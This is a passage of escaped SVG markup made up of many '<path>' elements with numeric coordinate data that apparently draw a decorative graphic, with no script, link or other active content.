d=\"M823.4,45.1c.5-.2,2.4.1,1.7-.4C822.8,44.4,819.8,44.5,823.4,45.1Z\"></path>\n        <path d=\"M772.8,36.3c1.3-.1.9-.5-2.5-1.2C770.4,35.4,771.1,35.8,772.8,36.3Z\"></path>\n        <path d=\"M1149.9,97.9c.7.4,1.2.8,4.5,1.3C1154.5,98.8,1152.9,98.4,1149.9,97.9Z\"></path>\n        <path d=\"M768.8,33.8c.8-.3-5.4-1.3-5.3-1C766.4,33.2,766.3,33.4,768.8,33.8Z\"></path>\n        <path d=\"M788,35.4c1.5.3,1.9.5,3.3.8-1.7-.8-1.4-1-2.7-1.7C788.6,34.9,787,34.8,788,35.4Z\"></path>\n        <path d=\"M757.2,29.7a24.5,24.5,0,0,0,3.5,1.2C760.6,30.5,760.9,30.2,757.2,29.7Z\"></path>\n        <path d=\"M822.2,40.4c3.2.5,4.3-.1,1.5-.9C824.5,40.1,819.4,39.6,822.2,40.4Z\"></path>\n        <path d=\"M792.7,35.2c3.8.6,4-.2-.5-1A7.77,7.77,0,0,1,792.7,35.2Z\"></path>\n        <path d=\"M771.3,30.8c-2.5-.4-2.5-.8-4.4-1.2,1,.7,1.1,1.4,5.9,2.3C773.3,31.5,766.8,30.3,771.3,30.8Z\"></path>\n        <path d=\"M755.5,28.2c2.7.2-2.4-1.1.5-.9-2.8-.4-2.2-.6-4.3-.9C753.8,27.2,751.7,27.1,755.5,28.2Z\"></path>\n        <path d=\"M769.3,28.7c-3.3-.6-1.8.1-3.9-.1,2.5.4,1.2.7,3.4,1.1a5.85,5.85,0,0,1,2,.2c-2.2-.9.8.1,1.9-.1C769.8,29,767.5,28.9,769.3,28.7Z\"></path>\n        <path d=\"M894.1,49.3c-3.4-.7-2.9.4.4.8C895.2,49.9,891.9,49.2,894.1,49.3Z\"></path>\n        <path d=\"M1097.3,82.7a4.69,4.69,0,0,0,2.5,1.3c-.6-.4,1.8.1.8-.4C1096.4,82.9,1101.5,83.4,1097.3,82.7Z\"></path>\n        <path d=\"M833,38.6c-.4.1-3.3-.4-1.9.1,1.2.2,3,.5,3.2.6s0,.3,1.2.5C836.9,39.8,834.7,39.2,833,38.6Z\"></path>\n        <path d=\"M768.9,27.8c-1,0-2-.1-3-.2.2-.2-.5-.5-2.3-.8-.4.3,2.5.9.3.7,2,.3,2.4.5,4.3.8C766.3,27.7,772.4,28.6,768.9,27.8Z\"></path>\n        <path d=\"M773.8,28c-.8.1-4.2-.6-2.9.1,1.6.2,3.9.7,4.1.6a10.32,10.32,0,0,1-2.2-.5C772.8,28,777.4,28.7,773.8,28Z\"></path>\n        <path d=\"M756.1,25.3c.2-.2,3.1.3,4,.2-2.4-.4-4-.7-5.2-.8C755.1,24.9,754.9,25,756.1,25.3Z\"></path>\n        <path d=\"M775.5,27.5c-.2.2-3.8-.5-4-.3,3.8.5,1.9.7,5.4,1.2C776.2,28.1,777.9,27.9,775.5,27.5Z\"></path>\n        <path d=\"M800.7,31.7c-5.5-1.1-2.1.5.2.5C798.3,31.7,800.5,31.7,800.7,31.7Z\"></path>\n        <path d=\"M767,25.8c.4.3,9,1.8,5.2.9,0,.1-.1.1-1-.1-.2-.2,0-.3-1.2-.5C770.1,26.3,767.2,25.7,767,25.8Z\"></path>\n        <path d=\"M798.2,30.4c-4.8-.6-3.8-.4-6.4-1.3-.3.3-.2.4-2.8.2,3.2.7,4.3.7,7.5,1.5,1.1,0,1.1-.1-.2-.5C797.5,30.4,798.7,30.6,798.2,30.4Z\"></path>\n        <path d=\"M775,26.4c-3.3-.6-4.2-.6-5.1-.5,1.8.3,3.3.6,4.3.8C773.9,26.4,775.3,26.6,775,26.4Z\"></path>\n        <path d=\"M868.2,41.4c-.6.3,5.7,1.5,6.5,1.4C872.5,42.4,870.4,41.9,868.2,41.4Z\"></path>\n        <path d=\"M1213.9,98.1c-.4.2-2.2.4,1.4,1C1214.6,98.7,1216.3,98.5,1213.9,98.1Z\"></path>\n        <path d=\"M1148.4,86.3c-1.6-.1-.9.7,2.5,1.3A7.85,7.85,0,0,0,1148.4,86.3Z\"></path>\n        <path d=\"M1152.3,82.2c-1.8,1.1-9.7,2-4.9,4.1,4.7,0,9.5-.3,3.7-2.5,1.9,0,2.6.8,4.2.7C1151.7,83.3,1155.1,82.7,1152.3,82.2Z\"></path>\n        <path d=\"M911.4,47c-.8-.4.1-.3,1.2-.2s2.4.3,2.7.3a22.5,22.5,0,0,0-2.7-.5C910,46.2,907.8,46.3,911.4,47Z\"></path>\n        <path d=\"M860.1,36.5a5.77,5.77,0,0,0-2.3,1.2c2.7.4,4,.5,4,.2C857.7,37.1,863.6,37.4,860.1,36.5Z\"></path>\n        <path d=\"M756.2,19.3c-1.5-.1-6.4-.6-2.8.3C752,18.9,759.3,20,756.2,19.3Z\"></path>\n        <path d=\"M842,33.1c5.8,1.3,3.8,1.5,5.8,2.1.2-.2,4.9.8,4,.2-4.6-.6-3-.9-4.5-1.4C844.1,33.5,845.3,33.7,842,33.1Z\"></path>\n        <path d=\"M850.7,35c1.5.3,1.9.5,3.2.8-1.7-.8-.4-.7.5-1C851.1,34.2,850.1,34.4,850.7,35Z\"></path>\n        <path d=\"M1133.4,81.1c-4.5-.8-3.3,0,.3.6Z\"></path>\n        <path d=\"M890,40.4c-2.4-.1,1.4.8,3.5,1.2C894.2,41.3,891.5,40.8,890,40.4Z\"></path>\n        <path d=\"M820.8,29a41.32,41.32,0,0,0-5.2-.8c1.7.3.7.4,2.3.7.1-.1-.4-.4.9-.2S821,29.3,820.8,29Z\"></path>\n        <path d=\"M851.3,34.3c1.7.1.1-1-2.4-1.1C852.2,33.9,846.6,33.5,851.3,34.3Z\"></path>\n        <path d=\"M741.7,15.1c.2.2-.7.1-2-.2.7.3-.9.5,1.4.9C739.4,15.1,745.5,16,741.7,15.1Z\"></path>\n        <path d=\"M912.7,44.2c1.7.2,2-.1.1-.5h-.1c-.4.1-2-.1-1.7.2C911.6,44,912.2,44.1,912.7,44.2Z\"></path>\n        <path d=\"M755.6,15.7c-3.7-.6-3.3-.9-6.5-1.4,3.3.9,1.6,1.2,4.8,1.9C752.3,15.5,755.3,16,755.6,15.7Z\"></path>\n        <path d=\"M862.3,32.9c1.5.6-5.3-.2.4.8C861.7,33.3,865.6,33.6,862.3,32.9Z\"></path>\n        <path d=\"M909.2,40.2a5.13,5.13,0,0,0,2.4,1.1c1.2-.1-.3-.2.8-.4Z\"></path>\n        <path d=\"M855.6,31a5,5,0,0,0-2.3-.8c-.5.1-2,0-2.9.1a28.64,28.64,0,0,1,3.2.6C853.7,30.8,853.8,30.7,855.6,31Z\"></path>\n        <path d=\"M735,11.1c3.4.6,5,.7,5,.4A22,22,0,0,0,735,11.1Z\"></path>\n        <path d=\"M1217.9,88c-.1-.3-.7-.8.7-.7C1214.2,86.6,1215.8,87.4,1217.9,88Z\"></path>\n        <path d=\"M893.1,32.6c-.3-.4.5-.7-2.5-1.2C890.7,31.8,891.4,32.1,893.1,32.6Z\"></path>\n        <path d=\"M885,29.7c.6.6-3.4-.5-5.2-.8-.5.1-2,0-2.9.1,3.2.2,10.4,1.6,12.3,1.5C887.4,30.2,886,29.9,885,29.7Z\"></path>\n        <path d=\"M891.9,29.9c-1-.7-5.4-1.8-.6-1.2-3.1-.7-8.5-1.5-10.7-2.1a.35.35,0,0,0,.1.2c3.1.6,5.9,1.3,7.6,1.8C884.4,28.1,889.4,29.4,891.9,29.9Z\"></path>\n        <path d=\"M860.4,24.6c3.2.7,4.3.2,1.8-.3C861.8,24.5,859.3,24,860.4,24.6Z\"></path>\n        <path d=\"M1216.1,82c.9.7-.5.8,2.6,1.4C1218.6,83,1218.2,82.5,1216.1,82Z\"></path>\n        <path d=\"M872.3,25.2c-1.5-.4,0-.7-3.5-1.2C869,24.3,869,24.7,872.3,25.2Z\"></path>\n        <path d=\"M861.4,22.8c-1.8-.3-3.3-.6-4.3-.8a19.44,19.44,0,0,0,5.5,1.5C861.2,23.1,861.6,23,861.4,22.8Z\"></path>\n        <path d=\"M872.3,23.1c-2.3-.3-3.6-.4-4-.2,1.4.2,2.3.4,3.2.6C870.5,23.1,872.8,23.5,872.3,23.1Z\"></path>\n        <path d=\"M889.7,25.2c-2.6-.4-4.2-.5-6.1-.7,1.6.3,1.1.5,1.3.7,1.4.4,3.9.8,5.4,1.1-.1-.2-.2-.3-.2-.5a27,27,0,0,1-3.1-.5.3.3,0,0,0-.1-.2C888.7,25.6,890.4,25.7,889.7,25.2Z\"></path>\n        <path d=\"M879,23.1a15,15,0,0,1-2.1-.4,4.83,4.83,0,0,0-2.2-.6c-.4.2.9.6,2.2.9C877.8,23.1,878.7,23.3,879,23.1Z\"></path>\n        <path d=\"M883.5,20.2c4.6.8,2.6-.1,2.7-.4C880.8,18.9,885.4,20.1,883.5,20.2Z\"></path>\n        <path d=\"M868.9,15.9c-3.3-.5-6.3-.6-8.4-1.4.5.4-4-.6-2.9,0,4.3.5,8.4,1.6,11.5,1.9C865.9,15.8,870,16.3,868.9,15.9Z\"></path>\n        <path d=\"M887.4,18.3c-.8-.1-2.4.4,1.4.9C886.7,18.6,890.2,19,887.4,18.3Z\"></path>\n        <path d=\"M871.6,15.4a26.52,26.52,0,0,1,5.5,1.3c.3.1.6.1,1,.2-.6-.8,3.8-.5-.7-1.6.2.2,0,.2-.3.3s-.9.1-.3.5C875.3,16,871.3,15.2,871.6,15.4Z\"></path>\n        <path d=\"M911,19c-2.8-.6-4.8-.2-.8.4C909.2,18.9,911.6,19.4,911,19Z\"></path>\n        <path d=\"M900.4,17.1c4.9.8,8.6,1.3,12.4,1.7-3.4-.6-3.3-1-6.5-1.5C910.3,18.6,902,17,900.4,17.1Z\"></path>\n        <path d=\"M1309.9,84.2c.9.5-1.6.1-.7.5,2.4.4,4,.6,5.2.8C1314.5,85.1,1312.9,84.7,1309.9,84.2Z\"></path>\n        <path d=\"M874.8,11.9c.1.2-2.9-.4-3-.3,2.8.4,2.2.6,4.3.9C877.3,12.6,877.2,12.3,874.8,11.9Z\"></path>\n        <path d=\"M895.9,15.7c.3-.3-1.2-.7-4.4-1.2C891.8,14.9,893.2,15.3,895.9,15.7Z\"></path>\n        <path d=\"M885.9,12.9c1.1.4.3.6,3.4,1.1,1.4.1.8-.3.7-.7C886.5,12.7,889.4,13.7,885.9,12.9Z\"></path>\n        <path d=\"M886.6,12.3c-6-1.1-1.2.6,1.2.5C886.6,12.6,886.6,12.4,886.6,12.3Z\"></path>\n        <path d=\"M892.2,11.9c.2.4,2.9.9,4.5,1.4,1.2,0,5.4.3.7-.7C898.2,13.4,894.2,12.3,892.2,11.9Z\"></path>\n        <path d=\"M882.6,7.8c.3-.3,2.9-.3-1.3-.8C883.9,7.6,877.7,7,882.6,7.8Z\"></path>\n        <path d=\"M877.4,5.7a24.14,24.14,0,0,1-2.8-.5,6.24,6.24,0,0,0,2.8.7,44,44,0,0,0,5.5.4C880.1,5.6,879.4,5.9,877.4,5.7Z\"></path>\n        <path d=\"M768.7,106.5a14,14,0,0,0-4.6-1.5C766.1,105.4,766.2,106.4,768.7,106.5Z\"></path>\n        <path d=\"M910.8,116.3a31.2,31.2,0,0,1,5.4,1.2,9.92,9.92,0,0,1-2.5-1.3C910.4,115.7,911.6,116.3,910.8,116.3Z\"></path>\n        <path d=\"M917.6,103.9c1.5.2,5.5,1,5.2.8-4.3-1,1-.7-3.7-1.6,0,.3,1.3,1-1.7.5a5.7,5.7,0,0,0-2.3-.8c-.3.3,2.6,1.1,4.4,1.2C919.9,104.2,918.2,103.9,917.6,103.9Z\"></path>\n        <path d=\"M743,70a10.32,10.32,0,0,1-2.2-.5c-.1-.1.8,0,.9-.1-3.7-.6-1.2.4-.7.6C741.1,69.8,743.7,70.3,743,70Z\"></path>\n        <path d=\"M893.4,89.4c-.5.4-6.9-1.3-7.2-.9C890.1,89.3,896,90.1,893.4,89.4Z\"></path>\n        <path d=\"M823.8,75.1c-.6.5,1.2,1.1-1.5,1,2.1.3,1.5.5,4.3.9C823.9,76.2,830,76.1,823.8,75.1Z\"></path>\n        <path d=\"M903.3,87.9c3.6.5,3.3.2,6.3,1a12.75,12.75,0,0,1,3.9.1,1.68,1.68,0,0,0,1,.2c-1.1-.4-3.6-.8-4.4-1.2,2.3-.2,2-1,5.4-.9-3.4-.7-2,0-4-.3-.1-.1-.2-.2-1.1-.3.6-.2,4.7.5,5,.3-4.4-.8,1-.3-2.4-1-1.6,0-.4.7-3.8.3.2-.2,1.7-.4-1.5-1.1q.45.45-1.8.3c-1.6-.6,2.3-.3-.4-.8-2.6.4-11.5.7-12,1.2,1.5.1,0-.6,3.9.1-1.2.2-.2.3,3.3.8-.2.2-3.5-.4-2.9.1C902,87.1,906.1,88,903.3,87.9Z\"></path>\n        <path d=\"M945.6,93.3c5.7,1.3,5.4,2.2,12.3,3.5-1.5-.5,2.8,0-.3-.6C954.3,96.3,950,93.7,945.6,93.3Z\"></path>\n        <path d=\"M928.2,89.2c-3.7-.6,2,0-1.2-.5-7.4-.5-1.7,1.7-4.1,1.5,2.1.3,4.5,1.2,6.3,1.2C922.7,90,925.6,89.1,928.2,89.2Z\"></path>\n        <path d=\"M1057,110.4a8.82,8.82,0,0,1,2.9,0c0,.3-1.8,0,1.3.7,2.2.1-1.5-.9-3.5-1.4C1059.2,110.4,1053.9,109.7,1057,110.4Z\"></path>\n        <path d=\"M931.9,88.8c-6.7-1.2-.3.9,1.3.8C930.9,89.2,932.5,89.1,931.9,88.8Z\"></path>\n        <path d=\"M914,85.9c2.5-.6.8-1.8,3.7-2.4-3.2-.3-3.1-.7-4.2-.7,2.2,1.3,1.6,1.7-4.2,1.3,2.7.5,4.1.9,4.4,1.2-1.8-.3-3.3-.5-4.1-.6C909.9,85,911.4,85.4,914,85.9Z\"></path>\n        <path d=\"M1047.5,98.3c-.1.1.3.4-.9.2,0-.3.3-.5,1.8-.4,3.3.5,8.4,1.8,9.6,1.8-4.3-.9-9.4-2.4-4.8-2-3.5-.7-.6.3-4.1-.5.2-.1,1.4,0,.8-.3a19.25,19.25,0,0,0,3.1.5c-1.4-.6,1.5,0,1.9-.1-6.2-1.1-3,.2-10.2-1.1-5.8.1,1.8,3.1-3.2,3.5,1.6.5,2.1.4,3.3.8-3.4-.4,0,.4-1.7.5a16.33,16.33,0,0,1,4.4,1.1,26.85,26.85,0,0,1-4.1-.5c-1.8-.4-.2-.6-2.4-1,.6.3-2.9.1-.7.5a47.56,47.56,0,0,1,7.4,1.3c3-.2.1-1.3-3.1-2.4,0,.1-.8,0-1-.2,2.4.4,1-.2,3,.2s1.7.8,3.5,1.2a18.21,18.21,0,0,1,3.2.5C1049.1,100.1,1053.7,100.2,1047.5,98.3Z\"></path>\n        <path d=\"M797,27.8c-1.8-.1-3.1-.7-5.2-.8,6.4,1.5,1.7,1.5,6.2,2.9-2.5-1.3,4.3-1.5-2.6-3.4a6.52,6.52,0,0,0,1.7-.3c-1.1,0-4.9-1.1-6.2-.9C794.5,26.2,791.2,26.6,797,27.8Z\"></path>\n        <path d=\"M861.8,6.9c5,.9,1.6.4,1.3.7q3.45.6,3.3.9a12.79,12.79,0,0,0-2.9.1c3.6.5,4.4.3,7,.5a35.67,35.67,0,0,1-5.4-1.2c.2-.2,3.1.3,4,.2-2.7-.4-4.5-.8-4.4-1.1C863.3,6.8,861.5,6.6,861.8,6.9Z\"></path>\n        <path d=\"M910.5,13.7c-3.1.2-6.8-.5-13.2-1.3,2.4.8,3.9.6,5.3,1-2.8-.3,1.9.8,2.4,1.1-1,.7-3.4.8,0,2.1-1.9-.2-3.7-.9-4.2-.7,3.7.5,1.1.7,4.4,1.2-1.6-.8-.6-.2,3.1.4-.7-.4-1.8-.9-2.5-1.3,1.2,0,3.9.5,5.1.5-3.2-.6,2.3.2.8-.3-3-.6-2.7-.3-5.2-.8a8.44,8.44,0,0,0-1.2-.4c2.5.3,4.8.7,5,.4a27,27,0,0,1-3.1-.5c1.9.3-2.7-1.4,2.9-.1.1-.2-1.3-.8,1.9-.1C909.1,14,915.8,14.8,910.5,13.7Z\"></path>\n        <path d=\"M922.9,80c.8-.1,2.8.2,1.8-.4C921.5,79,922.3,80,922.9,80Z\"></path>\n        <path d=\"M887.1,73.8c-.1-.2-.2-.3-.2-.5-2.5-.5-2.2-.2-5.2-.7-.3-.3.8-.4-2.3-.8a11.18,11.18,0,0,0,3.5,1.2C883.7,72.8,885.7,73.6,887.1,73.8Z\"></path>\n        <path d=\"M1027,96.2c.8.1,1.5.3,2.3.4,2.9-.2,1.2-.7,3.5-.7C1029.4,95.4,1028.3,96.2,1027,96.2Z\"></path>\n        <path d=\"M1047.2,95.7c-1.7-.1-6.4-.5-3.8.1C1042.6,95.2,1049,96.6,1047.2,95.7Z\"></path>\n        <path d=\"M924.7,75.5c4.7.9,2-.1,6.1.7,2.2.7-.8.4,1.4.9-1-.6,7,.8,5,.3a39,39,0,0,1-6.5-1.4c1.9.1,1.7-.2.7-.5-1.8-.1-1,.7-5-.3C927.2,75.6,923.4,74.9,924.7,75.5Z\"></path>\n        <path d=\"M746.9,45.1a23.56,23.56,0,0,1,4.1.5,12.3,12.3,0,0,0-3.4-1.1C750.8,45.2,743.9,44.7,746.9,45.1Z\"></path>\n        <path d=\"M1022.3,87.9l.3.6a18.2,18.2,0,0,0,3.1.5C1023.4,88.6,1025.6,88.4,1022.3,87.9Z\"></path>\n        <path d=\"M810.2,50a13,13,0,0,1-3.1-.4c1.2.7-1.6-.1-1.9,0,1.11.21,2.21.48,3.3.8-2.6-.5-2.5.1-.7.7-.8-.4.2-.4,3,.2.4.6,1.1.6.4,1,4.3.7,2,1,5.6,1.6-4.1-1.2.1-1.4-8.2-3.2C807.4,50,813.6,50.9,810.2,50Z\"></path>\n        <path d=\"M1046.7,90.4c3.2.4,1.4-.5,3.7-.4,5.9,1.4,7.3,2.7.9,1.9-1-.5,1.3-.1.8-.4-3.7-.5-4.4.6.7,1.4-.5-.9,4.8-.2,7.7-.2-1.2-.2-3-.5-3.2-.6,5.3,1,.3-.3,3.9.1-1.5,0,3.7.9,3.2.6-2.5-.4-2.5-.8-4.4-1.2.9.4-2.1-.1-3-.2.2-.2-1.5-.5-2.3-.7,4,.4,5.5.8,7.1.6-3.4-.6-3.1-.3-5.3-.9,1.4.7-3.5-.3-3.9-.1-.1-.1-.1-.2-.2-.4-1.4-.2-2.8-.5-4.2-.7C1049.9,90.2,1045,89.9,1046.7,90.4Z\"></path>\n        <path d=\"M1055.8,93.2a47.23,47.23,0,0,0,4.9.2C1056.2,92.5,1054.6,92.9,1055.8,93.2Z\"></path>\n        <path d=\"M1202.1,116.5c2.6.5,2.2.2,5.2.8C1207,116.2,1206,116.7,1202.1,116.5Z\"></path>\n        <path d=\"M948.2,74c4.8.6,3.5-.2,2.1-.9-.7-.4-1.5-.7-1-.8-3-.3-1.4.3-.2.8.9.4,1.6.8-.1.7-3.6-.6,2.6,0-2.3-.7C947.5,73.4,945.9,73.6,948.2,74Z\"></path>\n        <path d=\"M901,66.1c1.4.2,2.8.5,4.2.7C906.2,65.9,904.9,66.5,901,66.1Z\"></path>\n        <path d=\"M961.1,74.7c-1.3-.2-5.6.3-1.5.9C957.4,75,961.7,75.2,961.1,74.7Z\"></path>\n        <path d=\"M986.7,77.8c.3.5-6.9,1.1.9,1.9C988.9,79.3,989.9,79.1,986.7,77.8Z\"></path>\n        <path d=\"M817.5,49c-5.5-.9-6-2.7-2.1-2.5.8.6.4.8,1.5,1.3-.1-.2,2.9.4,3,.3-.3-.2-.8-.9-3.5-1.2,3,.3.6-.5,1.7-.5-3.1-.4-5.6-1.3-3.4-1a2.57,2.57,0,0,0,1.1.4c6.4-.1-3.8-3.2,4.5-2.8-1.5-.5-5.1-.7-5.3-1,5.7.4-2.3-2,4.1-1.7-1.08-.15-2.14-.35-3.2-.6,2.8.3,1.6-.9-.6-1.2.9-.3,3.6-.2,8.1.8-4.4-1.2,1.7-.3-.5-1-1.6.3-3-.9-6.5-1.4-.5.5-1.3.6,1.6,1.4-7.5-.1-1.9,2.5-4.3,3.3a32.89,32.89,0,0,1-5.2-.9c2.9.9,4.4,1.8,1.8,1.7,2.9.5,3.2.8,3.4,1.1-1.3-.2-1.5-.4-3.2-.6,0,.2.6.3,1.2.5-1.1-.2-1.3-.3-2.2-.5,1.6.6-2.6.1.3.7a6.05,6.05,0,0,1,1.9,0c-.1.2,1.3.5,1.3.7-4-.8-1.8,0-5.1-.6,3.1.9,3.4,1.1,1.6,1.4a24.16,24.16,0,0,1,4.3.9c-5-1.1-3.9.1-1.6.7-1.4-.2-2.3-.4-3.2-.6,1.2.9.9,1.6-2.1,1.6,4.7.7,3.3,1.3,2.6,1.4-1.3-.3-2.4-.5-3.3-.8,3,.7,2.7,0,.8-.3.9.8-3.3-.1-5-.3a72,72,0,0,0,10.6,2c-.4-.4-2.6-1.7,1.5-.9-3-.4,1.7.5,1.2.5-.6.4.4.5-.6.8a14,14,0,0,1,3.2.8c0-.2,3.4.5,3,.2C815.3,50.2,822.3,50.4,817.5,49Z\"></path>\n        <path d=\"M983.5,77.3c-.2-.4-3.9-1.1-5.6-1.6C975,74.8,979.8,76.8,983.5,77.3Z\"></path>\n        <path d=\"M888.4,59.9c2.4.2,1.7-.3-1.4-1,.6.9,1.9,1.6,0,2,1.4.2,4.1,1.1,4.3.8-3.7-1-.3-1,2.4-1C891.1,60.2,891.4,60.5,888.4,59.9Z\"></path>\n        <path d=\"M1043,84.4c-1.7.2,2.5,1,.6,1.2,6,1,.4-1-1.7-1.6-.4.1-5.1,0-2.8.2C1040.8,84.4,1040.5,84.1,1043,84.4Z\"></path>\n        <path d=\"M789.8,41.4c-6.2-1.1,1.8-.1-3.4-1.1.4.3-1.3,0-1.9,0,5.8,1.2-1.2.9,2.8,1.9C786.8,41.6,787.1,41.2,789.8,41.4Z\"></path>\n        <path d=\"M792,42c.1.4-3.6-.8-3.1-.4,1,.3.4.4,1.4.9,1.4.2,2.8.5,4.2.7C794.1,42.8,795,42.5,792,42Z\"></path>\n        <path d=\"M896.8,59.3c-.4-.3,5.4.5,1.8-.4.5.3-3-.4-3-.2,2.3.5-1.4.3,2.4,1.1.4-.2,1.7.5,3.2.6C902.2,60.2,897.6,59.7,896.8,59.3Z\"></path>\n        <path d=\"M1015.1,78.7c3.3.6,1.9,0,5.1.6,0-.1-.1-.2-.2-.4C1017.3,78.6,1017.2,78.9,1015.1,78.7Z\"></path>\n        <path d=\"M905.3,56.6c-5.8-.8-5.7-.6-10.3-1.4-.1.5,2.2,1-.6.8,7.5,1.4.4,1.3,2.8,1.9,2.6.2,0-.9,4.8-.1,2.6.6-1.7,0,1.3.7-.2-.6,1.4-1-1.9-2,3,.6,2.6.3,5.2.8C906.7,57.1,905.2,56.8,905.3,56.6Z\"></path>\n        <path d=\"M1143,95.6c-.8-1.1-4.4-2.8-.3-2.8-3.8-.5-1.7,0-4.3-.8,1.7,1-8.7.1-3.1,1.7a19.06,19.06,0,0,0-3.1-.4c4.5.7.7.5-.8.3,2,.9-.5,1.3-1,1.9,2.5.3,5.2,1.1,5.3.9-1.5-.3-1.3-.5-2.3-.7,6.5,1.1,4.9.5,9.3,1.2-4.8-.9,1.4-1-3.7-1.7C1139,95,1142.5,95.7,1143,95.6Z\"></path>\n        <path d=\"M792.2,36.3c-2.7,0-.7,1.1,1.9,2-1-.6,1-.4.6-.8C790.2,36.8,796.2,37,792.2,36.3Z\"></path>\n        <path d=\"M902.9,53.5c2.6.5,3.4.8,4.1.6-2.8-.4.7-.5-3.4-1-.9.1,3.3.9.2.5-3.9-1.1-2.7-1.8-1.9-2-6.7-1.4-3.7.6-3.3,1.1l-2.1-.3c.7-.2-1.8-.6-2.4-1,.3-.2,2.1.1,1.8-.3-3.5-.6-1.5.2-2.8.2,1.1.4,3.4.9,3.5,1.2-4.4-.5-.7.6-3.6.5q3.45.6,3.3.9a19.07,19.07,0,0,0-2-.2c0-.2-.9-.4-2.3-.7,1,.6-.2.7-2.7.4,3.6.4.8.5,3.3.9,2.3.2-1.5-1.1,3.9,0-.3.1-1.4,0-.8.3,4.5.8,5.3.8,8.5,1.6.9-.3-3.7-1-3.5-1.4,3.7.7,5.5,1.3,6.2.9-4.2-.7-6.3-1.3-6.6-1.8C905.2,55.2,901.7,53.6,902.9,53.5Z\"></path>\n        <path d=\"M753.8,28.6c3.9.5,2.2.7,5.4,1.1,1.5.1-.7-.9-2.3-.7-.3-.3,4.9.1-.4-.8,1.5.8-1.8.6-4-.2-2.9-.3,2.1,1.4-2.6.6,3.2.8,2.3.9,3.6,1.5C756.8,30.2,750.3,28.4,753.8,28.6Z\"></path>\n        <path d=\"M866.5,46c-1.6,0-6.8-1.1-5.1-.6,5.5,1,2.2,1.3,5.6,1.7C866.2,46.8,865.9,46.4,866.5,46Z\"></path>\n        <path d=\"M752.4,25.5c-4.1-.5-10.9-1.9-13.6-2.1,5.3,1,5.7,1.6,9.9,2.5C746.1,24.9,749.4,25.3,752.4,25.5Z\"></path>\n        <path d=\"M894.3,47.7c-2.1.2,1.6,1.5-1.4,1.2,7,1.2,3.5,1,5.7,1.8,2,.4,2.3.3,4.1.6-.1-.2-.2-.5-.3-.7-4.2-.8-1.7-1.1-1.5-1.1a42.22,42.22,0,0,0,4.3.8c.3-.2-2-.6-1.3-.8-3.5-.7-.6.3-4.1-.5.7-.2-1.6-.6-1.3-.8,5.9.6,5.2-.4,3.3-1.2C894.9,46.2,899.5,49.3,894.3,47.7Z\"></path>\n        <path d=\"M902.5,29.9c-5.4-.8,0,1.3-4.5.8.2-.3-6.3-1.5-5.2-.9,7.9,1,7.5,3,7.5,3.6,2.6.4-.6.8,2.7,1.6-.9,0-3.8-.6-3-.2,3.5.5,3.4,1.3,5.8,2.1-1.3-.2-1.4-.1-3.1-.4.1-.3-.2-.6-3.4-1.1,2.6.8,1,1.3,0,1.7a14.29,14.29,0,0,0-4.5-1.2c3,.6-.1.5.3.7,1.3.2,2.6.4,3.8.6-.5.3-.5.6.8,1-3.3-.6-2.1-.4-5.3-.9.1.3,2,.7,1.4.9-3.9-.7-4.5-.6-3.9-.1,2.5.2,2,.1,6.1.6.5.3,1.7.8.3.7-4.8-1.3-.5.2-5.2-.9a23,23,0,0,1-4.5.8c4,.7.4-.5,5,.4.1.2.2.5.3.7a21,21,0,0,0-4.1-.5c10,1.6,1.9,2.3,9.7,4.2-1.6-.3-2.7-.6-4.3-.9.4.3-1.3,0-1.9,0,1.5.5,3.1.3,4.3.8.4.5-.4.2-2-.2-.6.4,5.1,1.1,4.5,1.4-6.7-1.2.8.7-3.8,0,4.4,1,0,.5.5,1.1,4.5.9-.1-.6,2.9-.1.1.2,1.9.4,2.2.6a62.51,62.51,0,0,0,7.1.7c-6.9-1.1.8-.2-2.4-1.1,1.6.4,2.6.6,3.1.4-2.4-.4-1.3-.5-3.3-.9-.3.2-.1.5-2.9,0-2.2-1.5,2.1-1.5,5.8-2.2,4.1.9-1.5.6.5,1a17,17,0,0,1,3.1.5h0v-.1a.33.33,0,0,1,0-.47h0a.18.18,0,0,0,0-.27h0a6.37,6.37,0,0,0-1.7-.6c-.1.1-.2.2-2-.1-1.4-.6.5-.4-1.4-.9-8.6-1-4.5-2-2.9-2,.9-.3-2.8-.8-2.4-1.1,4,.6,5.5.5,3.8-.1-5.1-1-1.1.5-4.9-.1-.9-.6,3.8,0,.5-.9a29.59,29.59,0,0,0,5.2.8c-3-1.4-.3-1.4-3.2-2.6,2.1.3,1.5.6,4.3.9-2.1-1.9.1-3.1-3.4-5.2,3.8.7.7-.6,4,.1-4.3-1.2,1.9-.8-3-2.2,0,.1-1.3-.1-1.1-.3,2.8.4,2.2.6,4.3.9-.7-.3.9-.5-1.4-.9-.1.1-.2.2-2-.1-.1-.8,2-1,4.3-1.2,1.5.6,1,.6-.7.6,1.9.3,2.3.3,4,.6h.2a.3.3,0,0,1-.2-.1c-3.1-1.5-8.9-2.8-8.5-3.9-4.2-.8-2.4-.1-5.1-.5.2.4,2.9.9,3.5,1.2-4.6,0,.1,2.2.4,3a28.56,28.56,0,0,0-4.3-.9C899,29.1,901.3,29.5,902.5,29.9Z\"></path>\n        <path d=\"M907.2,42c.5-.1-1.5-.8.8-.4,1.1.2,2.6.4,1,.1-1.4-.2-2.8-.5-4.2-.7C906.5,41.4,903.8,41.3,907.2,42Z\"></path>\n        <path d=\"M909.1,48.3c-.8.2-2.1-.5-3.2-.6a5.88,5.88,0,0,1-2-.2c-.1.5,4.1.8,4.4,1.1-3.1-.4-2.9.1-3.7.4C907.7,49.2,909.7,48.6,909.1,48.3Z\"></path>\n        <path d=\"M738.1,23.9c-1.8-.7.8-.5-2.5-1.2C732.6,22.5,739.1,24.3,738.1,23.9Z\"></path>\n        <path d=\"M846.8,41.2c-.8.2,4.8,1.7,4.4,1.2C846.9,41.9,851.1,41.8,846.8,41.2Z\"></path>\n        <path d=\"M839.8,40.7c3.3.6,1.9,0,5.1.6-.6-.3.9-.4-1.3-.8C845.2,41.4,840,40.4,839.8,40.7Z\"></path>\n        <path d=\"M772.5,29.2c-1.9.3,10.2,2,5.3.9C777.6,30.6,774.4,29.5,772.5,29.2Z\"></path>\n        <path d=\"M757.7,26.5c-.3-.2.2-.4-1.3-.7-.7,0-2.7.4-.8.4.1-.4,4.1,1,4.1.6Z\"></path>\n        <path d=\"M763.2,25.9a1.82,1.82,0,0,0-1.1-.2c4.2.8-.1.3.3.7,3.4.4,3.1-.2,8.1.7-2.1-.3-1.5-.6-4.3-.9C766.5,26.4,765.3,26.3,763.2,25.9Z\"></path>\n        <path 